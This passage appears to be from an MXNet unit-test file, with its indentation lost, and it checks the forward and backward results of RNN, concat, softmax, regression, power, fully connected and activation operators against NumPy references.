X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
out1 = exec1.outputs[0].asnumpy()
exec1.forward(is_train=True)
out1 = exec1.outputs[0].asnumpy()
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a.asnumpy(), out_grad.asnumpy(), rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1.asnumpy(), ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad.asnumpy(), np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i].asnumpy(), gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i].asnumpy(), gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0].asnumpy(), np_out, atol=atol)
assert_almost_equal(grad_map["data"].asnumpy(), out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad.asnumpy(), np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x.asnumpy(), exec1.outputs[0].asnumpy())
exec1.backward(dy)
assert_almost_equal(dy.asnumpy(), dx.asnumpy())
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0].asnumpy()
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
@unittest.skip("Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/12885")
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0].asnumpy()
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0].asnumpy()
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0].asnumpy()
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
